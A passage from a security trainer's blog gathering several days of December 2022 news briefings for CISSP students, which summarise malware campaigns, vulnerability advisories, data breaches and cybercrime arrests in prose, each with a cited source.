Site blog

Les Bell
by Les Bell - Monday, 12 December 2022, 9:37 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Ethics of Reporting on Privacy Breaches

An interesting article on the ABC (Australia) web site examines the ethical issues faced by reporters in covering privacy breaches such as the recent Medibank breach. It's a topic I explore in a cybersecurity management course I teach, via a case study in which a hotel chain suffers a cryptominer infection via its guest wifi network. A relatively minor incident causes major reputational damage as security bloggers publicize it (coupled with inept crisis communications by the hotel chain's PR person), and I get students to discuss the allocation of responsibility, accountability and liability among the hotel IT staff, the hackers, the bloggers and the hotel guests themselves (after all, do you trust public wifi networks? I don't).

The Medibank breach was much more serious, seeing the release of personal medical information for millions of people. The ABC article examines the role of the general media in increasing the leverage available to extortionists, as well as the impact of reporting on the victims. It's thought-provoking material and useful to bear in mind for any future incident response planning, especially for crisis communications.

Terzon, Emilia, The editorial questions ABC News journalists faced when covering the Medibank data leak, ABC News, 11 December 2022. Available online at https://www.abc.net.au/news/backstory/2022-12-11/editorial-questions-reporting-on-medibank-hack/101737920.

Iranian Web Shell Campaign Uses GitHub as Dead Drop Resolver

Secureworks Counter Threat Unit researchers have reported on a malware campaign being run by a subgroup of the Iranian government sponsored threat group, COBALT MIRAGE. The initial intrusion is performed using any of several techniques; the specific intrusion analyzed by Secureworks started with compromise of a VMware Horizon server using two Log4j vulnerabilities.

Once initial access was obtained, the threat actor uploaded the Drokbk malware as a zip file which was extracted and then executed. The first stage of the malware is a dropper, which is created as a file, SessionService.exe, from an internal resource and then added to the SessionManagerService in order to persist. SessionService.exe is then executed; it begins by finding its C2 domain, which it does using the 'dead drop resolver' technique - this allows an actor to completely change its C2 infrastructure, with operating malware able to rediscover the C2 infrastructure via a public service, such as AWS S3 buckets, Pastebin or even comments on Britney Spears's Instagram account (yes, really). In this case, Drokbk uses the README.md file of a GitHub account to relay the C2 server name.

The analyzed sample initially sent a request, containing the hostname and time, to the C2 server, but no commands were received in response. Drokbk is only one of the tools being used by this threat actor; they are also known to use the Fast Reverse Proxy (FRPC) tool.

Secureworks Counter Threat Unit Team, Drokbk Malware Uses GitHub as Dead Drop Resolver, blog post, 9 December 2022. Available online at https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver.

Janicab Reemerges, Targeting Middle East and Europe

The Janicab backdoor, first seen in 2013, has reemerged in a campaign by a threat actor tagged Deathstalker, which appears to be targeting financial and legal institutions as well as travel agents in the Middle East and Europe, according to Kaspersky researchers. Janicab is cross-platform malware, able to run on both macOS and Windows, with the Windows version using a VBScript-based implant as the final stage and, rather than relying on downloaded exploitation tools, has much of the required functionality implemented internally.

Initial compromise is achieved via spear-phishing, using targeted lures in the form of a ZIP file containing a LNK-based dropper as well as a decoy document. Opening the LNK file executes a chain of malware files - an initial loader, a second stage which extracts a CAB archive containing additional resources and Python code, and finally, the last stage which is the Janicab backdoor. This then deploys a new LNK file into the Startup folder in order to persist.

Like Drokbk, described above, Janicab uses the 'dead drop resolver' technique to locate its C2 server - DeathStalker uses YouTube and WordPress web services for this purpose. Once communication is established, Janicab can perform a variety of functions such as keystroke logging, screen capture, running commands, checking for installed malware, etc. - the use of VBScript allows new modules to be added easily, and the number of variants seen to date suggest that it is under active development.

Global Research and Analysis Team, DeathStalker targets legal entities with new Janicab variant, APT report, 8 December 2022. Available online at https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
[ Modified: Monday, 12 December 2022, 10:36 AM ]
 
Les Bell
by Les Bell - Saturday, 10 December 2022, 9:27 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Poorly-maintained E-commerce Sites Infected with Skimmers

Skimmers have increasingly infected online stores, stealing customer credit card details from their web browsers as they enter them for payment processing. In many cases, they are loaded as part of the payment-processing page, typically as third-party libraries that have somehow been included in error by developers, and the problem is exacerbated by the fact that security staff know what is going on on their own systems, but not third-party code on customer browsers.

Now researchers at Jscrambler report on three new threat groups using a new technique to run these attacks. In the first case, the threat actor acquired the expired domain name of a third-party marketing and analytics service called Cockpit, replacing its library with their own malicious code. Using this technique, the attackers were able to compromise over 40 e-commerce sites, exfiltrating credit card details to a C2 server based in Russia. The Cockpit service was shut down in 2014, but the sites had not removed the deprecated libraries - a very basic error.

In the other campaigns, the skimmer code is injected directly, as a fake Google Analytics integration, although the code is similar. In all cases, the site that hosts the Javascript checks the HTTP referrer header value and based on this will either return no script at all (to make analysis more difficult), a default skimmer script, or a site-specific skimmer. It also typically only runs in two specific pages - the order page and the register page. All the campaigns make use of obfuscation techniques and encryption of exfiltrated data to hinder detection and analysis.

Fortuna, Pedro, Pedro Marrucho and David Alves, Defcon Skimming: A new batch of Web Skimming attacks, blog post, 5 November 2022. Available online at https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks/.

Four Sydney Men Arrested for Part in $US100 million Online Scam

Four Chinese nationals living in Sydney have been arrested by the Australian Federal Police for their part in an online investments scam that has resulted in over $US100 million in losses world-wide. The arrests follow intelligence supplied by the US Secret Service which led the AFP to set up Operation Wickham to investigate the scam, in cooperation with the NSW Police Force.

The scam started with a range of social engineering techniques to gain the trust of potential victoms via dating sites, employment sites and messaging platforms before mentioning investment opportunities. Once on the hook, victims were directed to a mixture of legitimate and fraudulent applications that deal in foreign exchange and cryptocurrency trading, but which have been manipulated to show a faked positive return on investments. Victims were also directed to a financial investment service which shows manipulated data through a legitimate application in order to encourage further investment while concealing the fact that their money has actually been stolen.

The four men who were arrested will appear in court in January, when police will allege they were used to register Australian companies in order to enhance the legitimacy of the fraud, as well as to launder the proceeds of the crime through Australian bank accounts (with $A22.5 million being restrained by the AFP in 24 bank accounts). Two of the men, aged 19, will be charged with recklessly dealing with proceeds of crime, while two others, aged 24 and 27, who were arrested in late November while trying to leave the country, are alleged to be the Australian 'controllers' of the syndicate.

AFP Media, Four men charged in Sydney for sophisticated cyber scam - world-wide losses expected to top US$100 million, media release, 9 December 2022. Available online at https://www.afp.gov.au/news-media/media-releases/four-men-charged-sydney-sophisticated-cyber-scam-world-wide-losses.

Google Opens Kimono on Android Privacy

Many Android features run continuously, accessing potentially sensitive information. For example, the Now Playing feature of Pixel phones continuously listens, through the microphone, in order to identify the music you can hear. Now, ask yourself how often you hear people say, "We were just alking yesterday about x, and today I'm getting lots of Facebook ads for x - I swear the these machines are listening to us!", and you can begin to understand why many people have concerns about their personal privacy.

As phone brands compete on the level of proactive personalization they provide, they can only offer services like traffic monitoring, giving efficient navigation as long as consumers will make use of such features. To aid in this, Google has released details of, and open-sourced, a key component of the Android privacy architecture, called Private Compute Core. This is a secure and isolated component of the Android OS that allows users to control how, when and where data is processed, both on-phone and by cloud services - for example, the latest phones are sufficiently powerful to perform some translation tasks on the phone itself, without interacting with the cloud.

In particular, Private Compute Core supports federated learning and analytics, which allows training of machine learning models while keeping private data on the phone. In essence, this downloads a training model to a sample set of users' phones; the models train on the data and then return the training results - not the data - back to the cloud. Model testing is performed in a similar, distributed, fashion, and differential privacy is also applied.

Google has now released a white paper describing the Private Compute Core, which controls data privacy for this process, and has also open-sourced the code as a GitHub project.

Kleidermacher, Dave, Dianne Hackborn and Eugenio Marchiori, Trust in transparency: Private Compute Core, blog post, 8 December 2022. Available online at https://security.googleblog.com/2022/12/trust-in-transparency-private-compute.html.

Cisco Warns of VoIP Phone Vulnerability

Ciso has issued a security advisory for its IP PHone 7800 and 8800 series firmware. A vulnerability in the Cisco Discovery Protocol (CDP) code can allow an unauthenticated attacker on the LAN to perform a stack smashing attack, allowing at least a denial of service, if not remote code execution.

There are no workarounds, other than disabling CDP and relying on Link Layer Discovery Protocol (LLDP) to allow the phone to discover its VLAN, nogotiate PoE, etc. - but this is a non-trivial and labour-intensive process. Enterprises which have been diligent in separating VoIP traffic from other data - ideally on a physically-separate network, if not a VLAN - will be much harder to exploit than those which have not, but ultimately the only fix is to obtain and deploy updated firmware which will be released in January.

Cisco, Cisco IP Phone 7800 and 8800 Series Cisco Discovery Protocol Stack Overflow Vulnerability, security advisory, 8 December 2022. Available online at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
 
Les Bell
by Les Bell - Friday, 9 December 2022, 9:12 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Government of Vanuatu Networks Shut Down

We start with a story which seems to have slipped under the radar for the last month. Following an election in the tiny Pacific islands nation of Vanuatu, when the new government took office on 6 November, they discovered that government email accounts would not work - and neither would any other computerized government services, such as drivers licence renewals, tax payments or medical information.

Being a tiny nation spread across many islands, there are few opportunities for redundancy in Vanuatu's computer networks, and so government systems are highly centralized in the capital, Port Vila. Government officials first discovered suspicious activity on their networks on 6 December, but only revealed the breach to local media several days later, with international media slow to pick up on the attack. Meanwhile, government services reverted to using pen and paper - which will severely slow service delivery across the dozens of islands that make up the country.

The Australian Cyber Security Centre has provided assistance, and several weeks on, approximately 70% of government services had been restored. These include financial services, health procurement, immigration and passport data and, most importantly, phone connections for emergency services.

As a small dot on the globe, albeit often voted the happiest nation in the world - and if you have visited, you'll know exactly what I mean - Vanuatu may have escaped attention from cybercriminals. But now the cyber world has caught up with it, and it may possibly have finally been subjected to a ransomware attack, although there is no confirmation of this.

McLaughlin, Jenna, The Pacific island nation of Vanuatu has been knocked offline for more than a month, NPR, 6 December 2022. Available online at https://www.npr.org/2022/12/06/1140752192/the-pacific-island-nation-of-vanuatu-has-been-knocked-offline-for-more-than-a-mo.

Internet Explorer Vulnerabilities Still Causing Damage

The tightly-coupled innards of Windows continue to cause trouble for Microsoft and its customers. Internet Explorer may be officially dead, replaced by Edge, but the Microsoft software ecosystem still relies on IE components for some functionality. An example is Microsoft Word, which renders HTML content in rich text documents using IE.

Now Google's Threat Analysis Group reports the discovery in October of a 0day exploit in the wild, targeting users in South Korea. The lure was an Office document entitled "221031 Seoul Yongsan Itaewon accident response situation (06:00).docx" - a reference to the tragic crowd crush incident during Seoul Halloween celebrations.

Once opened, the document downloads a remote RTF template containing HTML, which causes Office to call the IE rendering engine DLL. This technique is well known, but in this case, it exploits a 0day vulnerability (CVE-2022-41128)  in the IE JScript engine. The exploit JavaScript first contacts a C2 server, then launches the exploit shellcode, which covers its tracks by erasing the IE cache and history before downloading the next stage. Google's analysts did not have access to that code, but the same attackers have previous used a variety of implants such as ROKRAT, BLUELIGHT and DOLPHIN.

The infection could easily be blocked by an alert user, since the downloaded document carries the Mark of the Web and requires the user to disable protected view and allow editing. The attack is attrobuted to the North Korean group, APT37, also known as ScarCruft, Reaper and InkySquid.

LeCigne, Clement and Benoit Sevens, Internet Explorer 0-day exploited by North Korean actor APT37, blog post, 7 December 2022. Available online at https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/.

Darknet Service Trojanizes Legitimate Android Apps

A banking trojan campaign uncovered by fraud intelligence firm ThreatFabric has led investigators to a third-party dark web service which can bind malicious payloads to legimate Android applications, thereby tricking victims into installing them.

The initial campaign employed several types of desktop malware such as the Erbium stealer, Auora stealer and Laplas clipper, as well as the Ermac Android banking trojan. The latter was distributed by a one-page website offering applications for wi-fi authorization; several updates were downloaded, with payloads targeting different banking applications. The same site also offered downloads for Windows, which also carried banking trojans.

The researchers tracked these back to a binding service, initially offered by a threat actor in March 2022, called Zombinder, which is now used by several different actors. This is being used to distribute a variety of mobile malware, mainly banking trojans such as Ermac and Xenomorph.

Uncredited, Zombinder: new obfuscation service used by Ermac, now distributed next to desktop stealers, blog post, 8 December 2022. Available online at https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html.

Medibank Goes Offline To Remediate Its Networks

Australian insurer Medibank will take its systems offline - and close its retail storefronts - this weekend while it performs remediation work on the networks and systems which were affected by its recent highly-publicized data breach. All systems for both Medibank and its ahm general insurance subsidiary will be offline from 8:30 pm AEDT tonight (9 December) and are expected to be back online by Sunday 11 December at the latest.

The Medibank app, as well as online terminals for directly processing claims at service provider practices, will also be offline.  The lesson: never underestimate remediation costs following a breach.

Uncredited, Planned outage to Medibank systems, notification, 7 December 2022. Available online at https://www.medibank.com.au/health-insurance/info/cyber-security/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
 
Les Bell
by Les Bell - Thursday, 8 December 2022, 8:47 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


New Botnet Targets Multiple Architectures

FortiGuard Labs researchers have observed, and now analysed, a new botnet which is written in the Go programming language and is targeting IoT devices running on a variety of processor architectures - i386, amd64, arm, arm64, mips, mips64, mipsle, ppc64, ppc64le, riscv64 and s390x (although it is hard to imagine many IoT devices running the S/390 mainframe instruction set).

The botnet, called Zerobot, initially had only basic capabilities but in late November it added more functionality. Disassembly of the code revealed that after initial infection it tests Internet connectivity and then copies itself onto the target device, in an OS-dependent location, and then sets up a signal handler to intercept attempts to kill it. From there, it connects to its C2 server using the WebSocket protocol and sends some platform enumeration data, after which it waits for a command.

Zerobot Commands
Command Detail
ping Heartbeat, maintaing the C2 connection
attack Launch an attack, using different protocols: TCP, UDP, TLS, HTTP, ICMP
stop Stop attack
update Install update and restart Zerobot
enable_scan Scan for open ports and start spreading itself via exploit or SSH/Telnet cracker
disable_scan Disable scanning
command Run an OS command, using cmd.exe on Windows and bash on Linux
kill Kill the botnet program

Zerobot can employ any of 21 different exploits which target a range of IoT devices but also includes Spring4Shell, and exploits for phpAdmin and F5 Big-IP. It is rapidly evolving; within a very short time it was updated with string obfuscation, a copy file module and a propagation exploit module which gives it the ability to infect more devices. The FortiGuard Research post includes IOC's, but its rapid evolution means that proactive patching against its exploits will be the best defence.

Lin, Cara, Zerobot - New Go-Based Botnet Campaign Targets Multiple Vulnerabilities, blog post, 6 December 2022. Available online at https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities.

Sophisticated Attack on Amnesty International Canada

Amnesty International Canada (English-speaking Section) has revealed that it was the target of a sophisticated cyberattack which forensic experts from Secureworks believe was sponsored by the Chinese state. This conclusion is based on "the nature of the targeted information as well as the observed tools and behaviors, which are consistent with those associated with Chinese cyberespionage threat groups".

The breach was first detected on 5 October 2022, when suspicious behaviour was observed on Amnesty's IT infrastructure. Immediate action was taken, with Secureworks being retained to protect the organization's systems and investigate the attack. The investigation has uncovered no evidence that any donor or membership data was exfiltrated.

Amnesty is speaking publicly to warn other human rights organizations about the rising threat of cyber breaches, and to strongly condemn state and non-state actors who are intent on interfering with the work of human rights and other civil society organizations.

Ruf, Cory, Amnesty International Canada target of sophisticated cyber-attack linked to China, news release, 5 December 2022. Available online at https://www.amnesty.ca/news/news-releases/cyber-breach-statement/.

Likely Chinese APT Targets Middle East Telco

Researchers at Bitdefender have found a new cyber-espionage campaign which targeted a telecommunications firm in the Middle East. Investigation of sample binaries suggests the campaign is attributed to a Chinese threat actor called BackdoorDiplomacy.

The initial infection mechanism was an August 2021 ProxyShell exploitation of a vulnerable Exchange server. From there, the group deployed the NPS proxy tool and the IRAFAU backdoor into the organization. In February 2022, the attackers deployed the Quarian backdoor along with several other scanners and proxy/tunneling tools, with the use of keyloggers and exfiltration tools suggesting the campaign objective is cyber-espionage.

BackdoorDiplomacy has been operating since at least 2017, targeting institutions in the Middle East, Africa and the US. The researchers have produced a comprehensive 33-page whitepaper which details the techniques used for initial access, execution, reconnaisance, lateral movement, persistence, privilege escalation, defence evasion, collection and infiltration, as well as cataloguing the various tools used.

Schipor, Adriand and Victor Vrabie, BackdoorDiplomacy Wields New Tools in Fresh Middle East Campaign, blog post, 7 December 2022. Available online at https://www.bitdefender.com/blog/labs/backdoor-diplomacy-wields-new-tools-in-fresh-middle-east-campaign.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
 
Les Bell
by Les Bell - Wednesday, 7 December 2022, 8:24 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Russian Mayors' Offices, Courts, Hit by Wiper

Who can forget 2017's NotPetya attack - a wiper which spread around the world and across industries, yet likely started as an attack on the Ukrainian Government's tax revenues, by Russian threat actors? Now Russia is on the receiving end of a wiper attack, although it seems unlikely to have quite the same impact.

According to Kaspersky researchers, CryWiper is written in C++ and, unusually, compiled using the MinGW-w64 toolkit and gcc compiler, rather than the more common Microsoft tools - suggesting that the author was using a non-Microsoft OS for development. After creating a scheduled task in order to remain active, the malware contacts its C2 server, passing the name of the infected computer and, in response, the C2 server replies 'run' or 'do not run'. If instructed not to run, the malware delays execution with the intention of checking again in 4 days.

But if run, CryWiper stops any running MqSQL or SQL Server databases, deletes shadow copies of files and blocks RDP connections, presumably to slow incident responders. It then sets about overwriting user files with random data, which it generates using the Mersenne Vortex pseudo-random number generator (a characteristic it shares with the Isaac Wiper malware). It also leaves a ransom demand in a README.txt file - but of course, there is no point in paying the ransom.

CryWiper has been attacking systems in the Russian Federation, particularly courts and mayors' offices.

Sinitsyn, Fedor and Janis Zinchenko, Новый троянец CryWiper прикидывается шифровальщиком, Kaspersky SecureList blog, 1 December 2022. Available online at https://securelist.ru/novyj-troyanec-crywiper/106114/. Google translation at https://securelist-ru.translate.goog/novyj-troyanec-crywiper/106114/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp.

Ransomware is Accidental Wiper

In related news, Fortinet Labs reports on a ransomware toolkit called Cryptonite which has been used to produce customised ransomware for targeted campaigns. The toolkit provides a simple sample which lets the operator set an exclusion list server URL, email address and bitcoin wallet, but which lacks the more advanced features common in today's ransomware, such as shadow copy file deletion, file unlocking (e.g. stopping databases, as in the CryWiper example above), and antiforensics and evasion techniques.

However, Fortinet stumbled across a sample in the wild which went through all the steps of encryption, even displaying a progress bar as it pretended to be a software update. However, it never displayed the final window which would allow the victim to enter a decryption key. Suspecting the threat actor behind this sample had deliberately turned it into a wiper, the researchers set about decompiling the sample into its original Python code.

After being led astray by an interesting failure in the decompilation process, they turned to dynamic analysis, eventually tunning the sample in a cmd.exe window, which produced an error message that revealed all: the ransomware failed to load the tkinter library, which would be used to produce the pop-up window for the decryption key (tkinter is commonly used to implement GUI's for a number of scripting languages). This leaves no way for the victim to recover, as the decryption key is lost from memory when the program crashes, and is never sent to the operator.

The saving grace is that Cryptonite is very basic and should be easily detected by anti-malware programs. Also, the toolkit has now been removed from GitHub.

Revay, Gergely, The Story of a Ransomware Turning into an Accidental Wiper, blog post, 5 November 2022. Available online at https://www.fortinet.com/blog/threat-research/The-story-of-a-ransomware-turning-into-an-accidental-wiper.

Servers at Risk of RCE Exploits Via Baseboard Management Controllers

Last week we wrote of vulnerabilities in baseboard management controller chips which had been repurposed into devices on the Internet of Things. It was, perhaps, inevitable that the same vulnerabilities would show up in the rackmount servers which are the intended use case for BMC chips - and they have, according to a report from Eclypsium.

The vulnerabilities are actually in the AMI MegaRAC software which runs on the BMC circuitry of servers from many manufacturers including DELL EMC, HP Enterprise, and Lenovo as well as motherboard manufacturers such as ASRock, ASUS and Gigabyte. Eclypsium refers to the three vulnerabilities as BMC&C:

  • CVE-2022-40259 – Arbitrary Code Execution via Redfish API (CVSS v3.1 score: 9.9, Critical)
  • CVE-2022-40242 – Default credentials for UID = 0 shell via SSH (CVSS v3.1 score 8.3, High)
  • CVE-2022-2827 – User enumeration via API (CVSS v3.1 score 7.5, High)

Redfish is the successor to the older IPMI, and provides an API for server management in data centers. It is supported by almost all major vendors as well as the OpenBMC firmware project. The first two CVE's both lead directly to a root shell, with no further escalation necessary.

Suggested mitigations include ensuring that remote management interfaces are on dedicated management networks and not exposed externally, and disabling built-in administrative accounts.

Babkin, Vlad, Supply Chain Vulnerabilities Put Server Ecosystem at Risk, blog post, 5 December 2022. Available online at https://eclypsium.com/2022/12/05/supply-chain-vulnerabilities-put-server-ecosystem-at-risk/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
 
Les Bell
by Les Bell - Tuesday, 6 December 2022, 9:44 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Remember Ping of Death? You Are Not Alone

Many years ago, systems which used code from the BSD TCP/IP stack - which was most OS's of the era, including Windows - were plagued by a buffer overflow in the IP fragment reassembly code which would instantly crash the targeted system. This exploit was nicknamed the 'Ping of Death'. Now FreeBSD users are having a sense of deja vu, as they come to grips with a buffer overflow in the ping utility.

In order to process the ICMP echo reply (or other error) responses it receives, ping has to reconstruct the received IP header, its ICMP payload and - if there is one - the IP and ICMP headers of the error-generating datagram, which is the payload of ICMP itself. To do this, it calls a pr_pack() function which - and here's the vulnerability - fails to allow for any IP header options in either of the two IP headers. If there are options, the result is that the destination buffer is overflowed by up to 40 bytes - and those bytes could be carrying shellcode. Can you spell RCE? I knew you could!

But it gets better: because ping uses ICMP, it has to make use of a raw socket to work, and this requires root privileges - so it runs as a SetUID executable; in other words, as root. The saving grace is that the ping process runs in a capability mode sandbox on the affected versions of FreeBSD, and is thus very constrained in how it can interact with the rest of the system. But it's surprising what an ingenious attacker can achieve from such a tenuous toehold on a targeted system.

There is no workaround, and all supported versions of FreeBSD are affected. The fix is to upgrade to a supported version dated after 2022-11-29 23:00 UTC, approximately - see the security advisory for full details.

Uncredited, Stack overflow in ping(8), security advisory, 29 November 2022. Available online at https://www.freebsd.org/security/advisories/FreeBSD-SA-22:15.ping.asc.

Chinese Hackers Stole Tens of Millions of Dollars of US COVID Relief Funding

According to the US Secret Service, hackers associated with the Chinese government stole at least $US20 million in US COVID relief benefits, including Small Business Administration loans and unemployment insurance funds. The theft was performed by APT41, aka Winnti, a threat actor that splits its efforts between financially motivated cybercrime on its own behalf and cyber-espionage for the Chinese government.

Several members of APT41 were indicted by the Department of Justice for espionage operations, with Deputy Attorney General Jeffrey Rosen commenting at the time, "Regrettably, the Chinese Communist Party has chosen a different path of making China safe for cybercriminals so long as they attack computers outside China and steal intellectual property helpful to China".

Bing, Christopher, Chinese hackers stole millions worth of U.S. COVID relief money, Secret Service says, Reuters, 6 December 2022. Available online at https://www.reuters.com/technology/chinese-hackers-stole-millions-worth-us-covid-relief-money-secret-service-says-2022-12-05/.

Healthcare Ransomware Attacks Escalating

Ransomware attacks on hospitals, health insurers and other parts of the healthcare sector are steadily increasing and it seems likely that this will become one of the major security trends of 2023.

Last week, it was the turn of New Zealand health insurance company Accuro, which announced that it had lost access to its systems - which seems to be code for ransomware - and while it had no evidence of personal health information being exfiltrated, it could not rule it out. The previous month, patient data stolen from NZ GP network Pinnacle Health was posted on the web. And, of course, I need not mention Medibank.

Most recently, a hospital complex in Versailles, in the suburbs of Paris, had to cancel operations and transfer some patients because of a cyberattack, according to the French health ministry. The Hospital Centre of Versailles, which consists of Andre-Mignot Hospital, Richaud Hospital and the Despagne Retirement Home, had to shut down its computer systems, internet access and phone systems due to what appears to be a ransomware attack.

Extra staff had to be called in to the intensive care unit because although the equipment there was still working, it was not connected to the network, and doctors had to rely on people watching the screens. Six patients in total had to be transferred - three from intensive care and three from the neonatal unit, said the Minister, Francois Braun, duting a visit to the hospital.

Many other French hospitals have been attacked - the same hospital had successfully defended itself against previous attacks but back in August the Corbeil-Essonnes hospital, also on the outskirts of Paris, was disrupted for several weeks due to a ransomware attack. Although in that case, $US10 million ransom was demanded, it would not be paid, since the French government has legislated to make ransom payments illegal.

AFP, French hospital suspends operations after cyber attacks, France 24, 5 December 2022. Available online at https://www.france24.com/en/france/20221205-french-hospital-suspends-operations-after-cyber-attacks.

Palo Alto Introduces Medical IoT Security

In the cases above, the key equipment was not affected - only the networks and computers. But network-connected medical equipment such as infusion pumps, imaging devices (X-ray, MRI and CT scanners) and even more basic ECG monitors are increasingly based on embedded microcontrollers or computers - in many cases, even running COTS operating systems.

In fact, according to Palo Alto Networks' Unit 42 Threat Research, 75% of infusion pumps they studied had at least one vulnerability or threw up a security alert, while 51% of X-ray machines had a high-severity vulnerability (CVE-2019-11687). 44% of CT scanners and 31% of MRI machines had high-severity exposures and - not really a surprise - 20% of common imaging devices were running an unsupported version of Windows.

Seeing an obvious market opportunity - not to mention a need - Palo Alto has introduced a new Medical IoT Security product which will assess all devices and guide network segmentation to enforce the privilege of least privilege, using machine learning. There's lots of other functionality, including ensuring data residency requirements in various countries are met, regulatory compliance, device vulnerability management and automated response to anomalies.

It will be interesting to see how this pans out. According to medical professionals I have spoken to, they often need privileges in excess of their normal roles in order to respond to patient emergencies, and so attempts to tightly lock down medical information systems can be terribly counter-productive. But, as the previous story shows, the opposite approach doesn't work either. Find the 'sweet spot' is going to be a difficult process.

Xu Zou, The Medical IoT Security To Depend on When Lives Depend on You, blog post, 5 December 2022. Available online at https://www.paloaltonetworks.com/blog/2022/12/medical-iot-security-to-depend-on/.

Koppel, R., Smith, S., Blythe, J., & Kothari, V., Workarounds to Computer Access in Healthcare Organizations: You Want My Password or a Dead Patient?, in Driving Quality in Informatics: Fulfulling the Promise, 2015, vol. 208, pp. 215–220.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags:
 
Les Bell
by Les Bell - Monday, 5 December 2022, 8:41 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Golang SAML Library Allowed Authentication Bypass

One of the more popular distributed authentication protocols for web services is SAML, the Security Assertions Markup Language. When a user wants to authenticate to a service provider, she obtains a SAML assertion from her identity provider (to which she has previously authenticated using - probably - multi-factor authentication). She will then relay the SAML assertion to the service provider, which will validate the assertion and - because it trusts the identity provider - will then trust the user.

However, because the SAML assertion passes through the hands of the putative user, who could tamper with it, the assertion must be signed. But a twist in the way SAML assertions are constructed has led to a vulnerability (CVE-2022-41912), discovered by Google's Project Zero, in the crewjam SAML library for the Go programming language. A single SAML XML element can contain multiple assertions, and the crewjam library only validated the signature on the first. An attacker could therefore construct a SAML message containing one signed assertion and one or more unsigned assertions, allowing an authentication bypass awarded a CVSS score of 9.1.

There are no workarounds for this vulnerability - the only fix is to updated to crewjam/saml version 0.4.9 or later.

crewjam, crewjam/saml vulnerable to signature bypass via multiple Assertion elements due to improper authentication, security advisory, 2 December 2022. Available online at https://github.com/advisories/GHSA-j2jp-wvqg-wc2g.

Florida Man Gets 18 Months for Part in SIM Swap, Crypto Heist

A US District Court sentenced a Florida man to 18 months in prison last week for his part in a cryptocurrency theft which netted over $US20 million. US Attorney Damian Williams said,

